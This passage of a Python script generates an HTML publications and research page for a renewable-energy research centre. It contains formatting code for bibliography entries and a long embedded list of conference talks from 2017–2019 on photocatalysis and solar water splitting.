if imagewidth == 'Nature Communications':
image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Physical Review B':
image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Scientific Reports':
image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
else:
image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
allEntries[i]['image'])
if 'formattedauthor' in allEntries[i].keys():
formattedAuthor = allEntries[i]['formattedauthor']
if 'formattedtitle' in allEntries[i].keys():
formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
if 'journal' in allEntries[i].keys():
journal = ', <em>%s</em> ' % (
allEntries[i]['journal'])
if 'year' in allEntries[i].keys():
year = '<strong>%s</strong>,' % allEntries[i]['year']
if 'volume' in allEntries[i].keys():
if 'number' in allEntries[i].keys():
volume = '<em>%s(%s)</em>' % (
allEntries[i]['volume'], allEntries[i]['number'])
else:
volume = '<em>%s</em>' % (allEntries[i]['volume'])
elif 'number' in allEntries[i].keys():
number = '<em>%s</em>' % (allEntries[i]['number'])
if 'pages' in allEntries[i].keys():
pages = ','+allEntries[i]['pages']
if 'cited' in allEntries[i].keys():
if allEntries[i]['cited'] != '0':
cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
else:
cited = '<br><span class="cited" style="display:none> Cited: %s</span>' % allEntries[i]['cited']
if 'impactfactor' in allEntries[i].keys():
if 'impactfactoryear' not in allEntries[i].keys():
impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
else:
impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
if 'url' in allEntries[i].keys():
url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
allEntries[i]['url'], allEntries[i]['url'])
tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
journal + year + volume + number + pages + cited + impactFactor + url
tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
editorialsBody = editorialsBody + tempHtml
(totalarticles, articaltotalcitations, hindex, i10index,
citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
d = totalarticles+totalbooks+totalproceeds+1
editorialsBody = '<ol start=%s style="margin-top: 0px;padding-top:0px">%s</ol>' % (
d, editorialsBody)
editorials = editorials + editorialsBody
return editorials
def generatehtml():
prebody = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<script src="./js/jquery.min.js" type="text/javascript"></script>
<script src="./js/moment.min.js" type="text/javascript"></script>
<script src="./js/reverse_list.js" type="application/javascript"></script>
<script async src="./js/popper.min.js" crossorigin="anonymous"></script>
<script async src="./js/bootstrap.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" async src="./js/bibtex_js.js"></script>
<style type="text/css">
.cited {font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
color: #00F;
float: right;
}
#bookchapters {width: 960px;
}
#bookchapters h3 {text-align: center;
margin-top: 21px;
margin-bottom: 0px;
}
#proceedings {width: 960px;
}
#proceedings h3 {text-align: center;
margin-top: 21px;
margin-bottom: 0px;
}
#editorials {width: 960px;
}
#editorials h3 {text-align: center;
margin-top: 21px;
margin-bottom: 0px;
}
</style>
<link rel="stylesheet" type="text/css" href="./css/ircre.css" media="all">
<title>
International Research Center for Renewable Energy
</title>
</head>
<body>
<div id="header-ban">
<p> </p>
<div id="logo"><img src="images/ircrelogo.jpg" width="360" height="153" alt=""></div>
<ul>
<li><a href="index.html"><span>home</span></a></li>
<li><a href="people.html"><span>People</span></a></li>
<li><a href="facility.html"><span>Facility</span></a></li>
<li><a href="about.html"><span>About IRCRE</span></a></li>
<li class="selected"><a href="research.html"><span>Research</span></a></li>
<li><a href="press.html">PRESS</a></li>
<li><a href="events.html"><span>EVENTS</span></a></li>
<li><a href="contact.html"><span>contact us</span></a></li>
</ul>
<p>
</div>
<div id="body">
<div class="products">
<div id="second-header-ban">
<span style="float: left;">
<h2 class="second-header-ban-title">RESEARCH</h2>
</span>
<ul id="second-header-menu">
<li id="second-menu-articles"><a href="#articles"><span>ARTICLES</span></a></li>
<li id="second-menu-bookchapters"><a href="#bookchapters"><span>BOOK CHAPTERS</span></a></li>
<li id="second-menu-conferences"><a href="#conferences"><span>CONFERENCES</span></a></li>
<li id="second-menu-organizers"><a href="#organizers"><span>ORGANIZERS</span></a></li>
<li id="second-menu-proceedings"><a href="#proceedings"><span>PROCEEDINGS</span></a></li>
<li id="second-menu-editorials"><a href="#editorials"><span>EDITORIALS</span></a></li>
<li id="second-menu-seminars"><a href="#seminars"><span>SEMINARS</span></a></li>
<li id="second-menu-committee"><a href="#committee"><span>COMMITTEE</span></a></li>
</ul>
</div>
'''
afterbody = '''
<div id="divconferences">
<h3><a id="conferences"></a><strong>International Conference /
Workshop Talks</strong> <span
class="listcount">(323)</span></h3>
<h4>
<strong>Plenary/keynote lecture</strong> <span class="invited">(<strong>62</strong>)</span>,
<strong>Invited
talk</strong> <span class="invited">(<strong>144</strong>)</span>, <strong>Oral
presentation</strong>
<span class="invited">(<strong>116</strong>)</span>, <strong>Panelist</strong> <span
class="invited">(<strong>1</strong>)</span>
</h4>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2019 (12)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="323">
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Aqueous Chemical Design & Electronic Structure Engineering of Advanced
HeteroNanostructures for Efficient Solar Energy Conversion</strong>”, 7th International
Forum
for Young Scholars, UESTC Fundamental & Frontier Sciences, Chengdu, China, December 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Opening Plenary</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, 2019 Fall
Meeting
of the Korean Ceramic Society, Seoul, South Korea, November 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, 7th
International
Workshop on Nanotechnology & Applications, Phan Thiet City, Vietnam, November 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session Chairs</strong>)</span>,
“<strong>On the Anisotropic Charge Separation and the Growth of Highly Ordered
Heteronanostructures for Efficient Photocatalytic Water Splitting</strong>”, 236th
Electrochemical Society Meeting, Symposium I04 on Photocatalysts, Photoelectrochemical Cells,
and
Solar Fuels 10, Atlanta, GA, USA, October 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session Chair</strong>)</span>,
“<strong>Sustainable Energy from Seawater</strong>”, 10th International Conference
on
Materials for Advanced Technology (ICMAT), Symposium CC on Novel Solution Processing for
Advanced
Functional Materials for Energy, Environmental and Biomedical, Singapore, June 2019
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong>Invited</strong>)</span>, T.T.
Kong,
“<strong>Structure Design of Graphitic Carbon Nitride for Photocatalytic Water
Splitting</strong>”, E-MRS Spring Meeting, IUMRS-ICAM International Conference on Advanced
Materials, Symposium A on Latest Advances in Solar Fuels, Acropolis, Nice, France, May 2019
</li>
<li>
<u>J.S. Pap</u> <span class="invited">(<strong>Invited</strong>)</span>, D. Lukács, M. Németh,
Ł.
Szyrwiel, L. Illés, B. Pécz, <strong>S.H. Shen</strong>, <strong>L. Vayssieres</strong>,
“<strong>Behavior of Cu-Peptides under Water Oxidation Conditions – Molecular
Electrocatalysts
or Precursors to Nanostructured CuO Films?</strong>”, E-MRS Spring Meeting, IUMRS-ICAM
International Conference on Advanced Materials, Symposium A on Latest Advances in Solar Fuels,
Acropolis, Nice, France, May 2019
</li>
<li>
<strong><u>I. Rodríguez-Gutiérrez</u></strong> <span
class="invited">(<strong>Invited</strong>)</span>, J.Z. Su, G. Rodríguez-Gattorno, F.L. de
Souza, G. Oskam, “<strong>Infuence of the thin film physical configuration on the charge
transfer and recombination dynamics of WO<sub>3</sub>-BiVO<sub>4</sub> multilayer systems for
photoelectrochemical and solar fuel applications</strong>”, E-MRS Spring Meeting,
IUMRS-ICAM
International Conference on Advanced Materials, Symposium A on Latest Advances in Solar Fuels,
Acropolis, Nice, France, May 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Plenary Lecture & Session Chair</strong>)</span>, “<strong>Low-cost
Aqueous Design of Earth-abundant Nanostructures for Sustainable Energy from Seawater</strong>”,
International Symposium on Nanoscience & Nanotechnology in the Environment, Xi'an, China, April
2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, 257th ACS
National
Meeting, Symposium on Photocatalytic and Electrochemical Processes: Fundamentals and
Applications in
Green Energy and Environmental Remediation”, Orlando, FL, USA, March-April 2019
</li>
<li>
<strong><u>M. Fronzi</u></strong>, Hussein Assadi, Dorian Hanaor, “<strong>Theoretical
insights into the hydrophobicity of low index CeO<sub>2</sub> surfaces</strong>”, American
Physical Society (APS) March Meeting, Boston, MA, USA, March 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, SPIE Photonics
West, Symposium on Synthesis & Photonics of Nanoscale Materials XVI, Session on Synthesis &
Photonics of Nanomaterials, San Francisco, CA, USA, February 2019
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2018 (27)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="311">
<li>
<strong>M. Fronzi</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Reactivity
of metal oxide nanocluster modified rutile and anatase TiO<sub>2</sub>: Oxygen vacancy formation
and
CO<sub>2</sub> interaction</strong>”, EMN Meeting on Titanium- Oxides, Auckland, New
Zealand,
December 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, International
Symposium on Solar Energy Conversion, Nankai University, Tianjin, China, October 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Keynote & Session Chairs</strong>)</span>,
“<strong>Clean & Sustainable Energy from Photocatalytic Seawater Splitting</strong>”,
2018 AiMES ECS - SMEQ Joint Conference, Cancun, Mexico, October 2018
</li>
<li>
<strong><u>I. Rodríguez-Gutiérrez</u></strong>, R. García-Rodríguez, A. Vega-Poot, <strong>J.Z.
Su</strong>, G. Rodríguez-Gattorno, <strong>L. Vayssieres</strong>, G. Oskam, “<strong>Analysis
of the Charge Transfer Dynamics in Oxide Based Photoelectrodes through Small Perturbations
Techniques</strong>”, America International Meeting on Electrochemistry and Solid State
Science (AiMES 2018), Cancun, Mexico, October 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis?</strong>”, Frontiers of
Photonics, 31st Annual Conference of the IEEE Photonics Society (IPC-2018), Reston, VA, USA,
September 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Clean Sustainable Energy (& More) from Seawater</strong>”, Symposium on
Photo-Electrochemical Energy Conversion in Honor of Prof. Jan Augustynski, 69th Annual Meeting
of
the International Society of Electrochemistry, Bologna, Italy, September 2018
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Structure
Engineering of Graphitic Carbon Nitride for Efficient Photocatalytic Water Splitting</strong>”,
Taishan Forum for Advanced Interdisciplinary Research (FAIR), Jinan, China, September 2018
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>D.M. Zhao</strong> <span
class="invited">(<strong>Invited</strong>)</span>, “<strong>Structure Engineering of
Graphitic Carbon Nitride for Efficient Photocatalytic Water Splitting</strong>”,
International
Workshop on Water Splitting: Challenges and Opportunity, Xi'an, China, August 2018
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Engineering of α-Fe<sub>2</sub>O<sub>3</sub> and p-Si for Efficient Solar Water
Splitting</strong>”,
22nd International Conference on Photochemical Conversion and Storage of Solar Energy, Hefei,
China,
July-August 2018
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>D.M. Zhao</strong> <span
class="invited">(<strong>Invited</strong>)</span>, “<strong>Structure Engineering of
Graphitic Carbon Nitride for Efficient Photocatalytic Water Splitting</strong>”,
International
Conference on Energy and Environmental Materials (ICEEM), Hefei, China, July-August 2018
</li>
<li>
<strong><u>I. Rodríguez-Gutiérrez</u></strong>, R. García-Rodríguez, A. Vega-Poot, <strong>J.Z.
Su</strong>, G. Rodríguez-Gattorno, <strong>L. Vayssieres</strong>, G. Oskam, “<strong>Understanding
the Charge Carrier Dynamics in Oxide Based Photoelectrodes</strong>”, 22<sup>nd</sup>
International Conference on Photochemical conversion and Storage of Solar Energy (IPS-22),
Hefei,
China, July 2018
</li>
<li>
<strong><u>M. Fronzi</u></strong>, S. Tawfik, C. Stampfl, M.J. Ford, “<strong>Magnetic
character of stoichiometric and reduced Co<sub>9</sub>S<sub>8</sub></strong>”, Australian
Symposium on Computationally Enhanced Materials Design, Sydney, Australia, July 2018
</li>
<li>
<strong><u>J.W. Shi</u></strong>, Y.Z. Zhang, L.J. Guo<span
class="invited"> (<strong>Invited</strong>)</span>, “<strong>Hydrothermal growth of
CO<sub>3</sub>(OH)<sub>2</sub>(HPO<sub>4</sub>)<sub>2</sub>
nano-needles on LaTiO<sub>2</sub>N for enhanced photocatalytic O<sub>2</sub> evolution under
visible-light irradiation</strong>”, 12th International Conference on Ceramic Materials
and
Components for Energy and Environmental Applications (CMCEE 2018), Singapore, July 2018
</li>
<li>
<strong><u>Y.B. Chen</u></strong>, Y. Liu <span
class="invited">(<strong>Invited</strong>)</span>,
“<strong>Switchable synthesis of copper-based chalcogenide films for photoelectrochemical
water splitting</strong>”, 12th International Conference on Ceramic Materials and
Components
for Energy and Environmental Applications (CMCEE 2018), Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>On Seawater & Clean Energy Generation</strong>”, 12th International
Conference
on Ceramic Materials and Components for Energy and Environmental Applications (CMCEE 2018),
Symposium T4S12 on Advanced Ceramics Materials for Photonics, Energy & Health, Singapore, July
2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Latest Advances in Low-cost Solar Fuel Generation</strong>”, 12th
International
Conference on Ceramic Materials and Components for Energy and Environmental Applications (CMCEE
2018), Symposium T1S3 on Emerging Materials & Techonologies for Solar Cells & Solar Fuels
Technologies, Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Low-cost Fabrication of Advanced Heteronanostructures for Efficient Solar Energy
Conversion</strong>”, 12th International Conference on Ceramic Materials and Components
for
Energy and Environmental Applications (CMCEE 2018), Symposium T1S5 on Innovative Processing of
Nanostructured & Hybrid Functional Materials for Energy & Sustaibability, Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Sustainable Clean Energy from Seawater</strong>”, 12th International
Conference
on Ceramic Materials and Components for Energy and Environmental Applications (CMCEE 2018),
Symposium T3S1 on Photocatalysts for Energy & Environmental Applications, Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Clean Energy from Seawater</strong>”, 26th Annual International Conference
on
Composites/Nano Engineering (ICCE-26), Paris, France, July 2018
</li>
<li>
<strong>M. Fronzi</strong>, “<strong>Native-defects-related magnetic character of cobalt
sulphide</strong>”, International Workshop on Materials Theory and Computation, Xi’an
Jiaotong
University, Xi'an, China, June-July 2018
</li>
<li>
<strong>S.H. Shen</strong> <span
class="invited">(<strong>Invited talk & International Advisory Board</strong>)</span>,
“<strong>Engineering Hematite and Silicon for Efficient Photoelectrochemical Water
Splitting,
Symposium CE: Frontiers in Nanostructured, Nanocomposite and Hybrid Functional Materials for
Energy
and Sustainability</strong>”, 14th International Ceramics Congress (CIMTEC 2018), Perugia,
Italy, June 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session Chair</strong>)</span>, “<strong>Latest
Advances in Design, Performance, & Stability of Solar Seawater Splitting Materials</strong>”,
233rd Electrochemical Society Meeting, Seattle, WA, USA, May 2018
</li>
<li>
<strong><u>M. Fronzi</u></strong>, J Bishop, M Toth, M Ford, “<strong>Controlling Surface
Patterning of Diamond: The Origin of Anisotropy with Electron Beam Induced Etching</strong>”,
American Physical Society Meeting, Los Angeles, California, USA, March 2018
</li>
<li>
<strong><u>M. Fronzi</u></strong>, O Mokhtari, Y Wang, H Nishikawa, “<strong>Long-term
reliability of Pb-free solder joint between copper interconnect and silicon in photovoltaic
solar
cell</strong>”, American Physical Society Meeting, Los Angeles, California, USA, March
2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On The Stability & Performance of Low-Cost Devices for Solar Hydrogen
Generation</strong>”, 3rd Fusion Conference on Molecules and Materials for Artificial
Photosynthesis, Cancun, Mexico, March 2018
</li>
<li>
<strong><u>M.C. Liu</u></strong>, L.J. Guo<span
class="invited">(<strong>Keynote</strong>)</span>,
“<strong>On Controlling of the Mass and Energy Flow for Efficient Photocatalytic Solar
H<sub>2</sub> Production</strong>”, 2nd International Summit on Energy Science and
Technology,
Xi’an, China, January, 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>On Solar Water Splitting</strong>”, 8th IEEE International Nanoelectronics
Conference (INEC2018), Kuala Lumpur, Malaysia, January 2018
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2017 (43)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="284">
<li>
<strong><u>Y.K. Wei</u></strong>, Z.Q. Wang, <strong>J. Wang</strong>, <strong>J.Z. Su</strong>,
<strong>L.J. Guo</strong>, “<strong>BiVO<sub>4</sub>-rGO-NiFe Nanoarrays Photoanode:
Oriented
Hierarchical Growth and Application for Photoelectrochemical Water Splitting</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong><u>J. Wang</u></strong>, <strong>M.L. Wang</strong>, <strong>T. Zhang</strong>, <strong>J.Z,
Su</strong>, <strong>L.J. Guo</strong>, “<strong>Facile Synthesis of Ultrafine Hematite
Nanowire Arrays for Efficient Charge Separation</strong>”, 15<sup>th</sup> International
Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong><u>I.R. Gutiérrez</u></strong>, R.G. Rodriguez, M.R. Perez, A.V. Poot, G.R. Gattorno, G.
Oskam, “<strong>Charge transfer dynamics at inkjet printed
<em>p</em>-CuBi<sub>2</sub>O<sub>4</sub> photocathodes for photoelectrochemical water
splitting</strong>”, 15<sup>th</sup> International Conference on Clean Energy (ICCE 2017),
Xi'an, China, December 2017
</li>
<li>
<strong><u>W.L. Fu</u></strong>, <strong>F. Xue</strong>, <strong>M.C. Liu</strong>, <strong>L.J.
Guo</strong>, “<strong>Kilogram-scale production of highly active chalcogenide
photocatalyst
for solar hydrogen generation</strong>”, 15<sup>th</sup> International Conference on Clean
Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong><u>Y.P. Yang</u></strong>, <strong>X. Zhang</strong>, <strong>L.J. Guo</strong>, H.T.
Liu,
“<strong>Local Degradation Phenomena in Proton Exchange Membrane Fuel Cells with
Dead-ended
Anode</strong>”, 15<sup>th</sup> International Conference on Clean Energy (ICCE 2017),
Xi'an,
China, December 2017
</li>
<li>
<strong><u>Z.D. Diao</u></strong>, <strong>D.M. Zhao</strong>, <strong>S.H. Shen</strong>,
“<strong>Polycrystalline Titanium Dioxide Nanofibers for Superior Sodium Storage</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong><u>F. Xue</u></strong>, <strong>W.L. Fu</strong>, <strong>L.J. Guo</strong>,
“<strong>NiS<sub>2</sub>
Nanodots Decorated g-C<sub>3</sub>N<sub>4</sub> Nanosheets: A High-efficiency, Low-cost, and
Long-term Photocatalyst for Improving Hydrogen Evolution</strong>”, 15<sup>th</sup>
International Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>M.T. Li</strong> <span class="invited">(<strong>Keynote</strong>)</span>, <strong>D.Y.
Liu</strong>, <strong>Y.C. Pu</strong>, “<strong>Photo/Electrocatalysis: Mechanistic
Insight
and Catalyst Design from Density Functional Theory</strong>”, 15<sup>th</sup>
International
Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>J.Z. Su</strong> <span class="invited">(<strong>Keynote</strong>)</span>, <strong>J.L.
Zhou</strong>, <strong>C. Liu</strong>, “<strong>Enhanced Charge Separation in
BiVO<sub>4</sub> Electrodes by Zn Surface Modification and Back Contact Cu Gradient Profile
Doping
for Photoelectrochemical Water Splitting</strong>”, 15<sup>th</sup> International
Conference
on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>Y.B. Chen</strong> <span class="invited">(<strong>Keynote</strong>)</span>, <strong>Z.X.
Qin</strong>, <strong>M.L. Wang</strong>, <strong>R. Li</strong>, “<strong>Rational Design
of
Noble-metal-free Catalysts for Hydrogen Evolution Reaction</strong>”, 15<sup>th</sup>
International Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>M.C. Liu</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Controlled
Photocatalytic Nanocrystal for Tunable Solar H<sub>2</sub> Production</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong>M. Fronzi</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Origin
of Topological Anisotropic Patterns in Gas Mediated Electron Beam Induced Etching</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>On Photocatalytic Solar Hydrogen Generation</strong>”, 15<sup>th</sup>
International Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest advances & Challenges in Solar Water Splitting</strong>”,
1<sup>st</sup>
Frontiers in Electroceramics Workshop, Massachusetts Institute of Technology, Cambridge, MA,
USA,
December 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Design, performance and stability of low-cost materials for photocatalytic solar
water splitting</strong>”, 2017 MRS Fall Meeting, Symposium ES2: On the Way to Sustainable
Solar Fuels—New Concepts, Materials and System Integration, Boston, MA, USA, November 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Clean Energy from Seawater</strong>”, International Summit of the MRS
University Chapters on Sustainability & Nanotechnology, Boston, MA, USA, November 2017
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong>Invited</strong>)</span>,
<strong>Y.M.
Fu</strong>, <strong>W. Zhou</strong>, “<strong>Engineering Surface Structures and
Energetics
of α-Fe<sub>2</sub>O<sub>3</sub> and Si for Photoelectrochemical Water Splitting</strong>”,
18th International Conference of the Union of Materials Research Societies in Asia (IUMRS-ICA
2017),
Taipei, Taiwan, China, November 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest Advances in Water Splitting</strong>”, 18th International Union of
Materials Research Societies International Conference in Asia (IUMRS-ICA 2017), Symposium B2.
Photocatalysis and Photosynthesis, Taipei, Taiwan, China, November 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>On the low cost design, performance and stability of advanced electrodes for
photocatalytic (sea)water splitting</strong>”, 232nd Electrochemical Society Meeting,
Symposium on Photocatalysts, Photoelectrochemical Cells, & Solar Fuels 8, National Harbor, MD,
USA,
October 2017
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Modified Hematite and Silicon for Photoelectrochemical Water Splitting</strong>”,
International Conference on Functional Nanomaterials and Nanodevices, Budapest, Hungary,
September
2017
</li>
<li>
<strong>M.C. Liu</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Solar
Hydrogen Production via Photocatalysis: From Microscale Semiconductor Particle to Pilot Reaction
System</strong>”, UK-China International Particle Technology Forum VI 2017, Yangzhou,
China,
September 2017
</li>
<li>
<strong>M.C. Liu</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Complex
Photocatalysis via Simple Twinned Nanostructure</strong>”, 2017 China-UK Workshop on
Efficient
Energy Utilisation, Nanjing, China, August 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On low-cost photocatalytic water splitting</strong>”, XXVI International
Materials Research Congress, Symposium on Materials and Technologies for Energy Conversion,
Saving
and Storage (MATECSS), Cancun, Mexico, August 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the Design, Performance & Stability of Advanced Materials for Photocatalytic
Solar
Water Splitting</strong>”, XXVI International Materials Research Congress, 3rd
Mexico-China
Workshop on Nano Materials/Science/Technology: Renewable Energy and Environment Remediation
(NANOMXCN), Cancun, Mexico, August 2017
</li>
<li>
<strong><u>A. Hassanpour</u></strong>, <strong>L. Vayssieres</strong>, P. Bianucci,
“<strong>Optical
and Structural Properties of Arrays of Mg-doped ZnO Nanorods Prepared by a Low Temperature
Hydrothermal Method</strong>”, 18th Canadian Semiconductor Science & Technology
Conference,
Waterloo, ON, Canada, August 2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Modified Hematite Nanorods for Photoelectrochemical Water Splitting</strong>”, 7th
International Multidisciplinary Conference on Optofluidics, Singapore, July 2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Engineering of α-Fe<sub>2</sub>O<sub>3</sub> and p-Si for Efficient Solar Water
Splitting</strong>”,
33rd International conference of the Society for Environmental Geochemistry and Health (SEGH
2017),
Guangzhou, China, July 2017
</li>
<li>
<strong>M.C. Liu </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Nanotwin:
Simple Structure for Complex Photocatalysis</strong>”, 8th International Conference on
Hydrogen Production (ICH2P 2017), Brisbane, Australia, July 2017
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Engineered Hematite Nanorods for Efficient Photoelectrochemical Water Splitting</strong>”,
8th
International Conference on Hydrogen Production (ICH2P 2017), Brisbane, Australia, July 2017
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>Y.Z. Zhang</strong>, <strong>L.J. Guo</strong>,
“<strong>LaTiO<sub>2</sub>N-LaCrO<sub>3</sub>: Novel continuous solid solutions towards
enhanced photocatalytic H<sub>2</sub> evolution under visible-light irradiation</strong>”,
8th
International Conference on Hydrogen Production (ICH2P 2017), Brisbane, Australia, July 2017
</li>
<li>
<strong>M.C. Liu</strong>, “<strong>Seed-mediated Growth: A Versital Method for
Understanding
Crystal Habits</strong>”, 9<sup>th</sup> World Congress on Materials Science and
Engineering,
Rome, Italy, June 2017
</li>
<li>
<strong><u>A. Hassanpour</u></strong>, <strong>L. Vayssieres</strong>, P. Bianucci,
“<strong>Optical
and Structural Properties of Arrays of Ni-doped ZnO Nanorods Prepared by a Low Temperature
Hydrothermal Method</strong>”, 12th International Conference On Optical Probes of Organic
and
Hybrid Semiconductors, Quebec city, QC, Canada, June 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On Artificial Photosynthesis for Solar Water Splitting and Hydrogen
Generation</strong>”, IEEE Summer School on Nanotechnology, Montreal, Quebec, Canada, June
2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Overview & Latest Advances in Aqueous Chemical Growth of Advanced
Hetero-Nanostructures</strong>”, 9<sup>th</sup> International Conference on Materials for
Advanced Technology (ICMAT), Symposium L on Novel Solution Processes for Advanced Functional
Materials, Suntec, Singapore, June 2017
</li>
<li>
